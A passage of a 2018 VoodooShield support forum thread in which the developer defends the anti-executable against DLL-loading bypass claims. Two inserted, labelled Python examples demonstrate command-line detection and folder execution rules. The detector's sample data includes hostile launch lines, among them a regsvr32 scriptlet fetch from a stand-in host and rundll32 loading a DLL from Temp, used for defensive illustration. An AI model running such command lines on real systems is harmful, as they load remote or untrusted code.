Author Topic: VoodooShield v4 STABLE Thread  (Read 141486 times)

Shmu26
  • Jr. Member
  • Posts: 55
« Reply #1110 on: November 15, 2018, 07:58:28 pm »
VoodooShield is very diligent at monitoring the various command lines that could load dll files by other means. Nevertheless, reflective dll loading is one of the dirtiest tricks in the industry, it's tough to fight. Just my 2 cents. Let's hear what Dan says. :)
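
A worked illustration of the command-line monitoring Shmu26 describes, added here as an example; it is not VoodooShield code, and the event field names and sample records are constructed for the demonstration (loosely modelled on Sysmon process-creation events). It rates launches of the signed Windows binaries whose job is to load a module named on their command line (rundll32, regsvr32, control) by where that module comes from. The caveat is the one the thread is about: a module pulled in through DLL search-order hijacking or mapped reflectively from memory never appears on a command line, so a check like this cannot see it.

```python
"""Flag trusted Windows DLL hosts launched with a suspicious module argument.

Added example, not VoodooShield code. The event dicts stand in for
process-creation telemetry (field names are an assumption, loosely modelled
on Sysmon Event ID 1); SAMPLE_EVENTS is constructed for this demo.
"""
import re
from typing import Dict, List, Optional

# Signed Windows binaries whose purpose is to load a module named on their
# command line. An anti-exe that only gates .exe launches sees a trusted
# host here, so the object worth judging is the module it is told to load.
DLL_HOSTS = {"rundll32.exe", "regsvr32.exe", "control.exe"}
MODULE_EXT = (".dll", ".ocx", ".cpl")

# Path components an ordinary user (hence a dropper running as that user)
# can write to. A signed host loading from here is the classic
# "trusted process, untrusted module" pattern.
USER_WRITABLE = re.compile(
    r"(^|[\\/])(users|programdata|temp|tmp|appdata|downloads|desktop|public)([\\/]|$)",
    re.IGNORECASE,
)


def tokens(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, honouring double quotes."""
    out, cur, quoted = [], "", False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted          # quotes delimit; they are not part of the token
        elif ch.isspace() and not quoted:
            if cur:
                out.append(cur)
            cur = ""
        else:
            cur += ch
    if cur:
        out.append(cur)
    return out


def loaded_module(toks: List[str]) -> Optional[str]:
    """Return the module the host was asked to load, or None if none is named."""
    for tok in toks[1:]:
        if tok[:1] in ("/", "-"):
            continue                     # a switch such as /s, /n, /u, /i:...
        # rundll32 syntax is "<module>,<entrypoint> [args]"; drop the entry name
        candidate = tok.rsplit(",", 1)[0] if "," in tok else tok
        if candidate.lower().endswith(MODULE_EXT):
            return candidate
    return None


def assess(event: Dict[str, str]) -> Optional[Dict[str, Optional[str]]]:
    """Rate one process-creation event; None means it is not a DLL-host launch."""
    image = event["image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if image not in DLL_HOSTS:
        return None
    toks = tokens(event["cmdline"])
    module = loaded_module(toks)
    # regsvr32 /i:<url> pulls a scriptlet over the network before any module
    # on disk is touched, so it is rated before the module path is examined.
    remote = [t[3:] for t in toks if t.lower().startswith("/i:") and "://" in t]
    if remote:
        severity, reason = "high", f"regsvr32 scriptlet fetched from {remote[0]}"
    elif module is None:
        severity, reason = "low", "host launched without a module argument"
    elif USER_WRITABLE.search(module):
        severity, reason = "high", "module lives in a user-writable directory"
    elif "\\" not in module and "/" not in module:
        severity, reason = "medium", "unqualified name, resolved through the DLL search order"
    else:
        severity, reason = "low", "module under a system or program directory"
    return {"host": image, "module": module, "severity": severity,
            "reason": reason, "parent": event.get("parent")}


SAMPLE_EVENTS = [  # constructed for this example, not real telemetry
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'rundll32.exe "C:\Users\bob\AppData\Local\Temp\update.dll",Run',
     "parent": r"C:\Program Files\Mail\mail.exe"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32 /s /n /u /i:http://files.example/a.sct scrobj.dll",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\control.exe",
     "cmdline": r"control.exe C:\ProgramData\Vendor\setup.cpl",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\bob\notes.txt",
     "parent": r"C:\Windows\explorer.exe"},
]


def scan(events: List[Dict[str, str]]) -> List[Dict[str, Optional[str]]]:
    """Findings for every DLL-host launch in the event list, in input order."""
    return [f for f in map(assess, events) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['severity']:<6} {f['host']:<13} {str(f['module']):<48} {f['reason']}")
```

The parent process is carried through because it is usually the more telling field in practice (a mail client or office application spawning rundll32 is rarely benign), but the rating above deliberately uses only the command line so the limits of command-line monitoring stay visible.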

VoodooShield
  • VoodooShield Developer
  • VoodooShield Support
  • Sr. Member
  • Posts: 456
« Reply #1111 on: November 16, 2018, 03:39:40 am »
We have discussed this topic to death several times in recent years, and I am not going to waste a lot of time on this, so I will be very clear, blunt and to the point.

This topic was recently raised again when Umbra made the following uninformed and ignorant statement...

"Note that some are dlls, good luck to stop that if you use a simple anti-exe."

https://malwaretips.com/threads/the-pentagon-has-started-uploading-malware-samples-from-apts-nation-states.87924/post-776140

The reality is, there are two ways (that I know of) to test malicious DLLs... simply copying files to the desktop and executing them is not going to cut it for this test ;).  Instead, you can either take the time to learn the Metasploit framework and perform the appropriate tests, or you can learn how to code custom malware.  The last time I had a similar discussion with Umbra and his cohorts, they admitted that they were not familiar with Metasploit and, try as they might, were unable to perform the tests.  As for coding custom malware for tests???  It is probably safe to assume that their coding experience started and ended with a Hello World demo.

On the other hand, I have performed Metasploit tests and have written a few lines of code in my time, and I have not been able to bypass VS.  Early on, there were occasions when I was able to bypass dev versions of VS, but that is exactly how you harden your code.

Umbra is also aware that when a youtuber by the name of Black Cipher was bypassing pretty much every product on the market, including Umbra's favorite products... here is what he had to say about VS (in yellow at the bottom)...

www.voodooshield.com/artwork/BlackCipher.PNG

It is a shame that Black Cipher took his youtube channel down... it inadvertently demonstrated VS's robust protection capabilities.  I still have backups of the important ones though ;).  There have been several other people who have performed similar tests, and each time VS blocks the attack.

Anyway, it turns out that it is extremely difficult to bypass VS.  I guess if you think about it, it kind of makes sense...  No other dev or company has spent 7 years of 60-80 hours a week dedicated to refining their product and making it user-friendly for the masses.

I am certainly not suggesting that VS is absolutely bulletproof, but the only evidence that anyone has are tests where VS blocks the attack.

If Umbra is going to make these wild speculations, then someone needs to hold his feet to the fire and have him post the evidence.

I have handed Umbra's ass to him in the past, and I am willing to do it again.

But to answer your question "is there is a chance that another exe may import/launch the malicious dll?".  Sure, there is a chance.  There is also a chance that I will win the lottery (okay, to be fair, the odds are not quite that minute).  But until I am holding the winning ticket, or until someone produces evidence that demonstrates a bypass, it is probably best to bet on the product that time after time demonstrates how difficult it is to bypass, where others fail.

I have said time and time again that I am certain that there is something that can bypass VS, and many people have tried.  Someone will bypass it at some point, I just am not betting on Umbra unless he becomes familiar with the Metasploit framework or learns how to code.

VoodooShield
  • VoodooShield Developer
  • VoodooShield Support
  • Sr. Member
  • Posts: 456
« Reply #1112 on: November 16, 2018, 03:44:10 am »
> VoodooShield is very diligent at monitoring the various command lines that could load dll files by other means. Nevertheless, reflective dll loading is one of the dirtiest tricks in the industry, it's tough to fight. Just my 2 cents. Let's hear what Dan says. :)

Reflective dll injections were probably one of the first things people tried.  At some point, you are going to hit a road block.

People used to speculate constantly instead of test.  One can speculate all day long, but until you run the tests, you will simply never know.  What happens is they start to run the tests, then they encounter road blocks.

Here is some great info on reflective dll injections.

ssherjj
  • Global Moderator
  • Full Member
  • Posts: 130
« Reply #1113 on: November 16, 2018, 03:58:04 am »
Thank you Dan! Your last 2 posts were very exciting/encouraging/inspiring for me to read. You're a man of true passion in your work. I'm proud to be able to test and run your bullet proof program! I can't learn enough...

May I ask why my VS disappears and then it'll come back sometimes quickly or I have to restart it. I suppose I should do a clean install of VS...

Thanks!
Microsoft® Windows Insider MVP - Windows Security 
Webroot® SecureAnywhere™ Expert Product Advisor Webroot Forum Gold VIP  (Beta Tester)
VoodooShields  v4.69

VoodooShield
  • VoodooShield Developer
  • VoodooShield Support
  • Sr. Member
  • Posts: 456
« Reply #1114 on: November 16, 2018, 04:13:23 am »
> > > Hi Dan just noticing if I set to Disable/Install mode and upon reboot it goes back to Smart mode and before it used to stay in Disable/Install mode until I change it back to Smart Mode. v4.65
> > >
> > > TIA,
> > >
> > > Daniel
> >
> > Hey TH... please download the latest version from our website.  It should be fixed, but if not, please let me know, thank you!
> >
> > https://voodooshield.com/Download/InstallVoodooShield465.exe
>
> It's the same file and same hash. Maybe time for a clean reinstall?

I know this sounds odd... but what you might try is to change to a different mode, like maybe Always ON, then back to Smart (or whatever), then see if it works.  There is a variable known as "PreviousMode" that might be stuck on Disabled.  If that does not work please let me know and I will figure out why this is happening.  Thank you!

VoodooShield
  • VoodooShield Developer
  • VoodooShield Support
  • Sr. Member
  • Posts: 456
« Reply #1115 on: November 16, 2018, 04:15:51 am »
> Thank you Dan! Your last 2 posts were very exciting/encouraging/inspiring for me to read. You're a man of true passion in your work. I'm proud to be able to test and run your bullet proof program! I can't learn enough...
>
> May I ask why my VS disappears and then it'll come back sometimes quickly or I have to restart it. I suppose I should do a clean install of VS...
>
> Thanks!

Thank you ssherjj, I appreciate that!  Can you please send me your DeveloperLog.log (support at voodooshield.com)?

Sometimes it is a good idea to uninstall VS, have it delete the Settings and logs, then reboot and reinstall... especially if you have been using VS for several years and have not done so.  Especially if you installed a lot of beta versions along the way ;).  Thank you!

ssherjj
  • Global Moderator
  • Full Member
  • Posts: 130
« Reply #1116 on: November 16, 2018, 04:38:17 am »
> > Thank you Dan! Your last 2 posts were very exciting/encouraging/inspiring for me to read. You're a man of true passion in your work. I'm proud to be able to test and run your bullet proof program! I can't learn enough...
> >
> > May I ask why my VS disappears and then it'll come back sometimes quickly or I have to restart it. I suppose I should do a clean install of VS...
> >
> > Thanks!
>
> Thank you ssherjj, I appreciate that!  Can you please send me your DeveloperLog.log (support at voodooshield.com)?
>
> Sometimes it is a good idea to uninstall VS, have it delete the Settings and logs, then reboot and reinstall... especially if you have been using VS for several years and have not done so.  Especially if you installed a lot of beta versions along the way ;).  Thank you!

Dan it has been a while since I have sent logs. Are you wanting today's DevelopersLog.log? Let me know if you did not get my logs that I sent. beta
« Last Edit: November 16, 2018, 05:23:10 am by ssherjj »
Microsoft® Windows Insider MVP - Windows Security 
Webroot® SecureAnywhere™ Expert Product Advisor Webroot Forum Gold VIP  (Beta Tester)
VoodooShields  v4.69

CyberGhosT
  • Youngling
  • Posts: 10
  • Ummmm ... No :)
« Reply #1117 on: November 16, 2018, 05:44:13 am »
Hey Dan, great reading, glad things are going smooth, Stay Frosty  8)
Imma message you this weekend. PeAcE

Shmu26
  • Jr. Member
  • Posts: 55
« Reply #1118 on: November 16, 2018, 05:49:48 am »
> Hey Dan, great reading, glad things are going smooth, Stay Frosty  8)
> Imma message you this weekend. PeAcE

Hi Ghostie, always a pleasure when you make an appearance. I believe in ghosts! :)

VoodooShield
  • VoodooShield Developer
  • VoodooShield Support
  • Sr. Member
  • Posts: 456
« Reply #1119 on: November 16, 2018, 05:58:13 am »
> > > Thank you Dan! Your last 2 posts were very exciting/encouraging/inspiring for me to read. You're a man of true passion in your work. I'm proud to be able to test and run your bullet proof program! I can't learn enough...
> > >
> > > May I ask why my VS disappears and then it'll come back sometimes quickly or I have to restart it. I suppose I should do a clean install of VS...
> > >
> > > Thanks!
> >
> > Thank you ssherjj, I appreciate that!  Can you please send me your DeveloperLog.log (support at voodooshield.com)?
> >
> > Sometimes it is a good idea to uninstall VS, have it delete the Settings and logs, then reboot and reinstall... especially if you have been using VS for several years and have not done so.  Especially if you installed a lot of beta versions along the way ;).  Thank you!
>
> Dan it has been a while since I have sent logs. Are you wanting today's DevelopersLog.log? Let me know if you did not get my logs that I sent. beta

Thank you, I got your logs and emailed you.  I did not see any bugs except the google.com one from the internet check.  Anyway, the rest of the info is in the email, thank you!

VoodooShield
  • VoodooShield Developer
  • VoodooShield Support
  • Sr. Member
  • Posts: 456
« Reply #1120 on: November 16, 2018, 05:58:55 am »
> Hey Dan, great reading, glad things are going smooth, Stay Frosty  8)
> Imma message you this weekend. PeAcE

Hey CG, how are you?  Very cool, talk to you soon, have a great weekend!

oldschool
  • Jr. Member
  • Posts: 69
« Reply #1121 on: November 16, 2018, 05:59:31 am »
Dan - thanks for the explanation. No need to defend VS, as its track record speaks for itself. I'll believe the critics when I see VS users showing up on forums asking for help with malware infections. Until then the critics can keep screaming "fanboy", etc. VS works for me and I don't need to be a geek to use it!  8)
"... still trying to find the answers to life's persistent questions..." - Guy Noir, Private Eye

W10 1809 Windows Defender + VoodooShield Pro

VoodooShield
  • VoodooShield Developer
  • VoodooShield Support
  • Sr. Member
  • Posts: 456
« Reply #1122 on: November 16, 2018, 06:00:22 am »
> > > It was a little confusing trying to create an ideal rule for home use.
> >
> > Actually the rules are very useful on workstations.  This is my rule-set.  Do this rule for each account on the box.
> >
> > The same rule-set also locks down %Program Data%, as nothing should ever execute from that folder.  You will need to disable the rule-set for many installs.  Unfortunately, too many software sellers want to use your LUA %.\Low\Temp% for installs, and this also happens if you (cleverly) use Admin.  But at least you can stop cold any malware that wants to install itself on your box--it just won't happen and you won't even feel the bump in the road!  Software should install from wherever you put it, usually the desktop or your software archive.  I'm thinking of shutting down the Desktop as well, but I have too many legit maintenance apps there, I'll have to let VS interrogate those.
>
> Seems to be a folder-specific rule targeting process execution, especially during installation.  Going to give it a try for a week.  Hope it doesn't nag too much.

Very cool, please let me know how it goes!
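
The folder rule-set described in the quoted post, as an added worked example (this is illustration code, not VoodooShield's rule engine): one rule per account that denies execution from the staging folders a dropper can write to, with an install-mode switch that disables the set, as the poster says is needed for many installers. The denied folders (ProgramData, each account's AppData\Local\Temp and AppData\LocalLow) and the SAMPLE_ENV environment are assumptions made for the demo. The part worth studying is the path normalisation: case, forward slashes, ".." segments and %VAR% references all defeat a naive string-prefix check, and a prefix check that forgets the trailing separator would catch C:\ProgramData2 under the C:\ProgramData rule.

```python
"""Folder-based execution rules of the kind described in the quoted post.

Added illustration, not VoodooShield's rule engine. The denied folders
(ProgramData plus each account's Local\Temp and LocalLow) and SAMPLE_ENV
are assumptions made for the demo; ntpath lets it run on any OS.
"""
import ntpath
import re
from typing import Dict, List


class FolderRuleSet:
    """Deny execution from user-writable staging folders unless install mode is on."""

    def __init__(self, env: Dict[str, str], users: List[str]) -> None:
        self._env = {k.lower(): v for k, v in env.items()}   # %VAR% names are case-insensitive
        self.install_mode = False                            # True = rule-set disabled for an install
        denied = [env["ProgramData"]]
        for user in users:                                   # one rule per account on the box
            profile = ntpath.join(env["SystemDrive"] + "\\", "Users", user)
            denied.append(ntpath.join(profile, "AppData", "Local", "Temp"))
            denied.append(ntpath.join(profile, "AppData", "LocalLow"))
        self.denied = [self._norm(d) for d in denied]

    def _expand(self, path: str) -> str:
        """Expand %VAR% references from the supplied environment only (offline)."""
        return re.sub(r"%([^%]+)%",
                      lambda m: self._env.get(m.group(1).lower(), m.group(0)), path)

    @staticmethod
    def _norm(path: str) -> str:
        # Windows paths are case-insensitive; normpath collapses "..", "." and
        # forward slashes, all of which defeat a naive string prefix check.
        return ntpath.normcase(ntpath.normpath(path))

    def evaluate(self, image_path: str) -> Dict[str, str]:
        """Decide whether an executable at image_path may run under the rule-set."""
        if self.install_mode:
            return {"decision": "allow", "reason": "rule-set disabled (install mode)"}
        target = self._norm(self._expand(image_path))
        for folder in self.denied:
            # Match as a directory prefix, so C:\ProgramData2\x.exe is not
            # caught by the C:\ProgramData rule.
            if target == folder or target.startswith(folder + "\\"):
                return {"decision": "deny", "reason": f"executes from locked folder {folder}"}
        return {"decision": "allow", "reason": "no folder rule matched"}


SAMPLE_ENV = {  # constructed for the demo
    "SystemDrive": "C:",
    "ProgramData": r"C:\ProgramData",
    "TEMP": r"C:\Users\bob\AppData\Local\Temp",
}
SAMPLE_LAUNCHES = [  # constructed; the second and third try to dodge a prefix check
    r"C:\ProgramData\dropper.exe",
    r"C:\PROGRAMDATA\..\ProgramData\x.exe",
    "C:/programdata/sub/x.exe",
    r"%TEMP%\installer.exe",
    r"C:\ProgramData2\tool.exe",
    r"C:\Users\bob\Desktop\setup.exe",
]


def run_samples(install_mode: bool = False) -> List[str]:
    """Decisions for SAMPLE_LAUNCHES, in order."""
    rules = FolderRuleSet(SAMPLE_ENV, ["bob", "alice"])
    rules.install_mode = install_mode
    return [rules.evaluate(p)["decision"] for p in SAMPLE_LAUNCHES]


if __name__ == "__main__":
    for path, decision in zip(SAMPLE_LAUNCHES, run_samples()):
        print(f"{decision:5} {path}")
```

Two things this string-level model cannot do, and a real product must: resolve 8.3 short names (C:\PROGRA~3 is ProgramData on a typical box) and follow junctions or symbolic links, both of which need the filesystem to answer, which is why a kernel-level check should compare the file's canonical final path rather than whatever string the launcher supplied.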

simmerskool
  • Jr. Member
  • Posts: 65
« Reply #1123 on: November 16, 2018, 06:11:04 am »
Dan, thanks for the great explanations!

Getting back to @Mx's original question: VS would handle a dll attack like the one described not by scanning the dll in Ai, but rather by blocking the processes that try to load the dll. Correct?

my bad, sorry!  :-[

simmerskool
  • Jr. Member
  • Posts: 65
« Reply #1124 on: November 16, 2018, 06:19:27 am »
> > Hi Dan just noticing if I set to Disable/Install mode and upon reboot it goes back to Smart mode and before it used to stay in Disable/Install mode until I change it back to Smart Mode. v4.65
> >
> > TIA,
> >
> > Daniel
>
> Hey TH... please download the latest version from our website.  It should be fixed, but if not, please let me know, thank you!
>
> https://voodooshield.com/Download/InstallVoodooShield465.exe

ALERT! I tried the link from chrome which is currently running the malwarebytes browser extension, and guess what? MB totally blocked the link, could not bypass (unless of course I disabled MB ext -- happy to do that!) claiming "bad reputation" or some such bs.  How low is that for MB.  Geezz.